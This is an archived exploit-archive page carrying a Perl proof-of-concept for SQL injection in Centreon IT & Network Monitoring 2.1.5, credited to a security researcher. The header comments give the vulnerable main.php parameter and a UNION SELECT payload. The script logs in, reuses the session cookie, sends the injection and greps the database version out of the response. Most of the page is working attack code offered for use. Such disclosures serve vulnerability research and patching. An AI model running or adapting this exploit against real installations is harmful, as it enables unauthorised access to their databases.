AOH :: HP Unsorted C :: BX6046.HTM

Vulnerability Centreon IT & Network Monitoring v2.1.5



Vulnerability Centreon IT & Network Monitoring v2.1.5
Vulnerability Centreon IT & Network Monitoring v2.1.5



#!/usr/bin/perl
# //--------[PoC]---------//
#
# Title   : Centreon IT & Network Monitoring v2.1.5 - Injection SQL
# Version : 2.1.5
# Author : Jonathan Salwan (j.salwan@sysdream.com) 
#
#
# [Vuln sql injection]
# http://localhost/centreon/main.php?p 1&host_id=-1%20[SQL 
Injection]&o=p&min=1
# 
# http://localhost/centreon/main.php?p 1&host_id=-1 UNION SELECT 
1,@@version,3,4,5&o=p&min=1
#
#
# //-------[Credit]-------//
#
# http://www.sysdream.com/article.php?story_id=328§ion_id=78 
# http://www.shell-storm.org 
#

use LWP::UserAgent;

my $url = 'http://localhost/centreon/index.php'; 
my $login = 'login';
my $paswd = 'pwd';
my $sql = 'http://localhost/centreon/main.php?p 1&host_id=-1 UNION 
SELECT 1,@@version,3,4,5&o=p&min=1';

my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

my $req2 = $ua->post($url, 
                    {useralias => $login, password => $paswd, submit =>
'login'},
                    Cookie => $cook,
                    Content-Type => 'application/x-www-form-urlencoded'
                    );

my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

        open(FILE, '>sql-centreon.txt');
        print FILE $content;
        close(FILE);

        print "\n[Answer SQL Injection]\n\n";

        my $selection = system('cat sql-centreon.txt | grep
">Host"');
        unlink('sql-centreon.txt');     

print "\n";



The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.